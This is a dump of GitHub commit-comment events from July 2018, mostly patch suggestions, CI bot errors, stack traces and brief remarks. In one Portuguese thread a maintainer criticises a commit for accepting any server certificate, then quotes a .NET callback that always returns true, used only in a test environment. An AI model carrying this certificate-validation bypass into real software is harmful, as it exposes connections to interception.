{"id":"7991510230","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29770305,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:41:50Z","updated_at":"2018-07-19T20:41:50Z","author_association":"OWNER","body":"Try this patch\r\nSave it to a file and do\r\n`git apply patchfile`\r\nIf it works I will push a commit for it.\r\n```\r\nIndex: app/Watcher.php\r\nIDEA additional info:\r\nSubsystem: com.intellij.openapi.diff.impl.patch.CharsetEP\r\n<+>UTF-8\r\n===================================================================\r\n--- app/Watcher.php\t(revision 7e8e62ab13217cf99ce568e400181a6eb4f2727a)\r\n+++ app/Watcher.php\t(date 1532032433000)\r\n@@ -101,6 +101,9 @@\r\n \r\n     public function __construct()\r\n     {\r\n+        if (PHP_OS !== \"Linux\")\r\n+            return;\r\n+\r\n         $this->fd = inotify_init();\r\n         if ($this->fd === false)\r\n             dd('Unable to initialize main inotify descriptor.');\r\n@@ -117,6 +120,9 @@\r\n \r\n     protected function trackEx($path, $isDirectory, $parentWd, $data = [], $recursive = false)\r\n     {\r\n+        if (PHP_OS !== \"Linux\")\r\n+            return false;\r\n+\r\n         if (file_exists($path) === false)\r\n             return false;\r\n \r\n@@ -256,6 +262,9 @@\r\n \r\n     public function go($once = false)\r\n     {\r\n+        if (PHP_OS !== \"Linux\")\r\n+            return;\r\n+\r\n         while (true) {\r\n             $events = inotify_read($this->fd);\r\n             // keep polling for events if there are none\r\n\r\n```"}},"created_at":"2018-07-19T20:41:50Z"}
{"id":"7991511176","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29770306,"position":null,"line":null,"path":null,"commit_id":"9c5fffb4c51fb53a105b20c97eab19e2ff252788","created_at":"2018-07-19T20:42:02Z","updated_at":"2018-07-19T20:42:02Z","author_association":"NONE","body":"Looks like I slept through a lot of changes yesterday.\r\nNo problem, I won't complain. Looks like good work. 👍"}},"created_at":"2018-07-19T20:42:02Z"}
{"id":"7991513778","type":"CommitCommentEvent","actor":{"login":"jorgegonzalez"},"repo":{"name":"jorgegonzalez/zoe"},"payload":{"comment":{"id":29770313,"position":null,"line":null,"path":null,"commit_id":"c825c7b77764552fbeab596f7b76024ecc2910cc","created_at":"2018-07-19T20:42:35Z","updated_at":"2018-07-19T20:42:35Z","author_association":"OWNER","body":"Closes #34 "}},"created_at":"2018-07-19T20:42:35Z"}
{"id":"7991519566","type":"CommitCommentEvent","actor":{"login":"luiszimmermann"},"repo":{"name":"luiszimmermann/DFe.NET"},"payload":{"comment":{"id":29770326,"position":5,"line":98,"path":"NFe.Servicos/ServicosNFe.cs","commit_id":"8feea752c2b3f7c5a30bb24fc0b219b7feaa0e56","created_at":"2018-07-19T20:43:47Z","updated_at":"2018-07-19T20:43:47Z","author_association":"OWNER","body":"Essa parte no código faz com que a aplicação aceite QUALQUER certificado que o servidor do SEFAZ esteja utilizando, mesmo que inválido. Acho que outra forma deve ser vista para a resolução do problema.\r\nEm minha aplicação que também tenho esse problema de vez enquanto, faço isso apenas em homologação:\r\n`\t\t\t\tif (nfe.infNFe.ide.tpAmb == NFe.Classes.Informacoes.Identificacao.Tipos.TipoAmbiente.taHomologacao)\r\n\t\t\t\t{\r\n\t\t\t\t\tSystem.Net.ServicePointManager.ServerCertificateValidationCallback +=\r\n\t\t\t\t\tdelegate (object sender, System.Security.Cryptography.X509Certificates.X509Certificate certificates,\r\n\t\t\t\t\t\t\t\t\t\t\tSystem.Security.Cryptography.X509Certificates.X509Chain chain,\r\n\t\t\t\t\t\t\t\t\t\t\tSystem.Net.Security.SslPolicyErrors sslPolicyErrors)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\treturn true; // **** Always accept\r\n\t\t\t\t\t};\r\n\t\t\t\t}`"}},"created_at":"2018-07-19T20:43:47Z"}
{"id":"7991523670","type":"CommitCommentEvent","actor":{"login":"luiszimmermann"},"repo":{"name":"luiszimmermann/DFe.NET"},"payload":{"comment":{"id":29770330,"position":null,"line":null,"path":null,"commit_id":"8feea752c2b3f7c5a30bb24fc0b219b7feaa0e56","created_at":"2018-07-19T20:44:40Z","updated_at":"2018-07-19T20:44:40Z","author_association":"OWNER","body":"> Atualmente era possível resolver o erro mudando o procolo SSL por meio de ServicePointManager.SecurityProtocol. Mesmo assim a aplicação poderia parar de funcionar depois de algum tempo.\r\nO problema disso agora para a NFe 4.0 é que o único protocolo permitido é o TLS1.2. Testei essa resolução sem sucesso..."}},"created_at":"2018-07-19T20:44:40Z"}
{"id":"7991524776","type":"CommitCommentEvent","actor":{"login":"mbeacom"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29770331,"position":5,"line":557,"path":"app/retail/emails.py","commit_id":"98bb4a03463124f34f7c26cd8c59f30521bdc54e","created_at":"2018-07-19T20:44:53Z","updated_at":"2018-07-19T20:44:53Z","author_association":"MEMBER","body":"🙌 "}},"created_at":"2018-07-19T20:44:53Z"}
{"id":"7991525408","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29770332,"position":23,"line":584,"path":"test/Render.spec.js","commit_id":"73b18c3ce7b33b4a5d23e4b35f5d3b787284a7db","created_at":"2018-07-19T20:45:01Z","updated_at":"2018-07-19T20:45:01Z","author_association":"NONE","body":"(for posterity)\r\nI misinterpreted this line: https://github.com/thysultan/dio.js/blob/master/dist/umd.js#L3085\r\nwhich led me to believe `.property = ` was being called all over the place\r\n\r\nthanks"}},"created_at":"2018-07-19T20:45:01Z"}
{"id":"7991527352","type":"CommitCommentEvent","actor":{"login":"Aipeeri"},"repo":{"name":"Aipeeri/gitHubREp"},"payload":{"comment":{"id":29770338,"position":1,"line":1,"path":"gitHubREp/pages/hello","commit_id":"f1690bc1015aa0313573bb8296129776c4d8ca1f","created_at":"2018-07-19T20:45:22Z","updated_at":"2018-07-19T20:45:22Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-19T20:45:22Z"}
{"id":"7991527699","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29770339,"position":null,"line":null,"path":null,"commit_id":"10dffe383e88999da12797581131c30cf0f3ebee","created_at":"2018-07-19T20:45:26Z","updated_at":"2018-07-19T20:45:26Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-19T20:45:26Z"}
{"id":"7991536021","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29770364,"position":null,"line":null,"path":null,"commit_id":"e00edb1db1e85ccb62ee51c7b6fcc96a0b29926a","created_at":"2018-07-19T20:47:08Z","updated_at":"2018-07-19T20:47:08Z","author_association":"COLLABORATOR","body":"![photo_2018-07-19_13-42-10 2](https://user-images.githubusercontent.com/6131799/42969160-9e1c2442-8ba5-11e8-9643-80f4a3cc9c74.jpg)\r\n![photo_2018-07-19_13-42-10](https://user-images.githubusercontent.com/6131799/42969161-9ea21d9a-8ba5-11e8-8032-e4d35cf71215.jpg)\r\n\r\noder wie könnte man das noch nennen"}},"created_at":"2018-07-19T20:47:08Z"}
{"id":"7991540380","type":"CommitCommentEvent","actor":{"login":"adeniltonbs"},"repo":{"name":"luiszimmermann/DFe.NET"},"payload":{"comment":{"id":29770370,"position":null,"line":null,"path":null,"commit_id":"8feea752c2b3f7c5a30bb24fc0b219b7feaa0e56","created_at":"2018-07-19T20:48:01Z","updated_at":"2018-07-19T20:48:01Z","author_association":"NONE","body":"@luiszimmermann \r\nBoa tarde,\r\nEsse não é o commit mais recente.\r\nPor favor olhe os commits https://github.com/ZeusAutomacao/DFe.NET/commit/303d8f523ca48987b3b5f4f8808eb1d46b203ff0 e \r\nhttps://github.com/ZeusAutomacao/DFe.NET/commit/0a2e3ebbe316b9818b2f6de117adf415635396b8."}},"created_at":"2018-07-19T20:48:01Z"}
{"id":"7991540859","type":"CommitCommentEvent","actor":{"login":"valeriojr"},"repo":{"name":"valeriojr/iFace"},"payload":{"comment":{"id":29770371,"position":null,"line":null,"path":null,"commit_id":"fcdfe242a234dc6f4edf7b070543ab12ca578614","created_at":"2018-07-19T20:48:07Z","updated_at":"2018-07-19T20:48:07Z","author_association":"OWNER","body":"Consertar a ordem da entrada na linha 280"}},"created_at":"2018-07-19T20:48:07Z"}
{"id":"7991543875","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770382,"position":null,"line":null,"path":null,"commit_id":"ace9d1f6bcc277a119c153a1035e724a6531c058","created_at":"2018-07-19T20:48:44Z","updated_at":"2018-07-19T20:48:44Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nmissed comma between flow collection entries at line 40, column 77:\n     ... r.name + browser.channel + chunk[0] + chunk[1])}\n                                         ^\n\n</details>"}},"created_at":"2018-07-19T20:48:44Z"}
{"id":"7991546283","type":"CommitCommentEvent","actor":{"login":"oliuz"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29770386,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:49:15Z","updated_at":"2018-07-19T20:49:15Z","author_association":"NONE","body":"I include this in the **watcher.php** file or do I create another new file? and I name it with any name?"}},"created_at":"2018-07-19T20:49:15Z"}
{"id":"7991547512","type":"CommitCommentEvent","actor":{"login":"dcrystalj"},"repo":{"name":"dcrystalj/hdpiano"},"payload":{"comment":{"id":29770387,"position":null,"line":null,"path":null,"commit_id":"2a9fc20d19481584ac8ad9012c79d5b1bcbc39c7","created_at":"2018-07-19T20:49:30Z","updated_at":"2018-07-19T20:49:30Z","author_association":"OWNER","body":"i dont have permissions anymore"}},"created_at":"2018-07-19T20:49:30Z"}
{"id":"7991549263","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29770392,"position":null,"line":null,"path":null,"commit_id":"d31b75ffb4bc181c8966e88a4ad6033efc8443a9","created_at":"2018-07-19T20:49:54Z","updated_at":"2018-07-19T20:49:54Z","author_association":"NONE","body":"A speculative LTC should use less bandwidth. So i have lowered throughput."}},"created_at":"2018-07-19T20:49:54Z"}
{"id":"7991549393","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29770393,"position":null,"line":null,"path":null,"commit_id":"6adcc7e2b3d25c1915de55f0d01c9bafa2989d11","created_at":"2018-07-19T20:49:55Z","updated_at":"2018-07-19T20:49:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Crayons](https://trello.com/c/9A6lNHFk/11-crayons)"}},"created_at":"2018-07-19T20:49:55Z"}
{"id":"7991552096","type":"CommitCommentEvent","actor":{"login":"pierobot"},"repo":{"name":"pierobot/mangapie"},"payload":{"comment":{"id":29770405,"position":null,"line":null,"path":null,"commit_id":"bde57a0f62b9c297665caac982c0c7ccff91e056","created_at":"2018-07-19T20:50:29Z","updated_at":"2018-07-19T20:50:29Z","author_association":"OWNER","body":"you can put it anywhere and save it with whatever name\r\n``git apply path/to/patch.file``"}},"created_at":"2018-07-19T20:50:29Z"}
{"id":"7991554790","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29770415,"position":null,"line":null,"path":null,"commit_id":"51dc0da48b2b98fc1919cf9119f048bfa58a78be","created_at":"2018-07-19T20:51:05Z","updated_at":"2018-07-19T20:51:05Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-229](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-229).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-229-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-19T20:51:05Z"}
{"id":"7991555675","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29770417,"position":null,"line":null,"path":null,"commit_id":"51dc0da48b2b98fc1919cf9119f048bfa58a78be","created_at":"2018-07-19T20:51:15Z","updated_at":"2018-07-19T20:51:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-229](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-229).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-229-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-19T20:51:15Z"}
{"id":"7991559170","type":"CommitCommentEvent","actor":{"login":"silvia-odwyer"},"repo":{"name":"michealodwyer26/The-Legend-Of-The-Golden-Arches"},"payload":{"comment":{"id":29770431,"position":null,"line":null,"path":null,"commit_id":"73481d586dffba1021e9b74a3bbb67e9f0fc278b","created_at":"2018-07-19T20:52:00Z","updated_at":"2018-07-19T20:52:00Z","author_association":"NONE","body":"What a commit, what a commit. 🙏 "}},"created_at":"2018-07-19T20:52:00Z"}
{"id":"7991571928","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770459,"position":null,"line":null,"path":null,"commit_id":"79eae05fc468ad3711df09e32dffb68516c16422","created_at":"2018-07-19T20:54:34Z","updated_at":"2018-07-19T20:54:34Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nInterpreterError at template.tasks.taskId: infix: + expects number/string + number/string\n\n</details>"}},"created_at":"2018-07-19T20:54:34Z"}
{"id":"7991572584","type":"CommitCommentEvent","actor":{"login":"edwindo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29770463,"position":110,"line":110,"path":"jwt/JWT.php","commit_id":"32081ae460eb7ee880c599fde51e194de1f8a718","created_at":"2018-07-19T20:54:41Z","updated_at":"2018-07-19T20:54:41Z","author_association":"NONE","body":"Comment needs ending punctuation"}},"created_at":"2018-07-19T20:54:41Z"}
{"id":"7991575643","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29770474,"position":null,"line":null,"path":null,"commit_id":"41edceddbe5a4b9f2427151fbef1fa40de5f479c","created_at":"2018-07-19T20:55:19Z","updated_at":"2018-07-19T20:55:19Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-98](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-98).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-98-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-19T20:55:19Z"}
{"id":"7991577958","type":"CommitCommentEvent","actor":{"login":"ryanpcmcquen"},"repo":{"name":"SurLaTable/slt-ui"},"payload":{"comment":{"id":29770480,"position":5,"line":6,"path":"builder/async.js","commit_id":"f01522aa62c6514bff24c94792235c4eb3afb642","created_at":"2018-07-19T20:55:46Z","updated_at":"2018-07-19T20:55:46Z","author_association":"MEMBER","body":"I love this change."}},"created_at":"2018-07-19T20:55:46Z"}
{"id":"7991584481","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29770500,"position":null,"line":null,"path":null,"commit_id":"9b36a772a836734ea9c9be2170395adb0669846d","created_at":"2018-07-19T20:57:08Z","updated_at":"2018-07-19T20:57:08Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should have required property 'created'\n  * data should have required property 'deadline'\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-19T20:57:07.994Z\n\n</details>"}},"created_at":"2018-07-19T20:57:08Z"}
{"id":"7991588611","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29770512,"position":null,"line":null,"path":null,"commit_id":"43ef416c532177eef96bf6a34a930689bc4f8ad1","created_at":"2018-07-19T20:57:58Z","updated_at":"2018-07-19T20:57:58Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.202.43ef416c532177eef96bf6a34a930689bc4f8ad1](http://build.palaso.org/viewLog.html?buildId=125216&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Failed to resolve artifact dependency Build time: 00:00:18"}},"created_at":"2018-07-19T20:57:58Z"}
{"id":"7991589949","type":"CommitCommentEvent","actor":{"login":"Fish-Git"},"repo":{"name":"Fish-Git/hyperion"},"payload":{"comment":{"id":29770514,"position":46,"line":2261,"path":"console.c","commit_id":"fd92ebac6f55bd64289ee5198316011a1e2c4d8c","created_at":"2018-07-19T20:58:16Z","updated_at":"2018-07-19T20:58:16Z","author_association":"OWNER","body":"Comment out (or remove) this line, e.g:\r\n\r\n```C\r\n//       {  \"IBM-3477-FC\",     '5',   FALSE  },\r\n```\r\n\r\nthen rebuild Hercules, and try TELNET'ing again from your AS/400. The first terminal type sent by your OS/400 (\"IBM-3477-FC\") should then be rejected, and Hercules _should_ ask your OS/400 client for its next terminal type.\r\n\r\nAs long as the next terminal type that your OS/400 sends to Hercules is one of the other ones in the table, then Hercules should accept the connection.\r\n\r\nDoing this would verify that my new logic is working correctly.\r\n\r\nThanks!"}},"created_at":"2018-07-19T20:58:16Z"}
{"id":"7991594701","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29770527,"position":null,"line":null,"path":null,"commit_id":"d31b75ffb4bc181c8966e88a4ad6033efc8443a9","created_at":"2018-07-19T20:59:12Z","updated_at":"2018-07-19T20:59:12Z","author_association":"OWNER","body":"Np. Thx.\n\nOn Thu, Jul 19, 2018, 2:49 PM Stefan Geschwentner <notifications@github.com>\nwrote:\n\n> A speculative LTC should use less bandwidth. So i have lowered throughput.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/protonspring/Stockfish/commit/d31b75ffb4bc181c8966e88a4ad6033efc8443a9#commitcomment-29770392>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AcVnSHR-uLhiaa9SNZ8wJc92wlpHbt6Lks5uIPDygaJpZM4VXElx>\n> .\n>\n"}},"created_at":"2018-07-19T20:59:12Z"}
{"id":"7991598771","type":"CommitCommentEvent","actor":{"login":"divnych"},"repo":{"name":"divnych/da-ya"},"payload":{"comment":{"id":29770539,"position":null,"line":null,"path":null,"commit_id":"291cfcdbcd3e526be56b0bd29a7dce499c830bce","created_at":"2018-07-19T21:00:04Z","updated_at":"2018-07-19T21:00:04Z","author_association":"OWNER","body":"9"}},"created_at":"2018-07-19T21:00:04Z"}
{"id":"7991604815","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"proshin-roman/blog"},"payload":{"comment":{"id":29770558,"position":null,"line":null,"path":null,"commit_id":"2ca2bcdf234b926001dd39f121591a5800b3cbed","created_at":"2018-07-19T21:01:15Z","updated_at":"2018-07-19T21:01:15Z","author_association":"NONE","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> no implicit conversion of String into Integer\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nTypeError\nno implicit conversion of String into Integer\n/app/objects/job.rb:39:in `dig'\n/app/objects/job.rb:39:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in 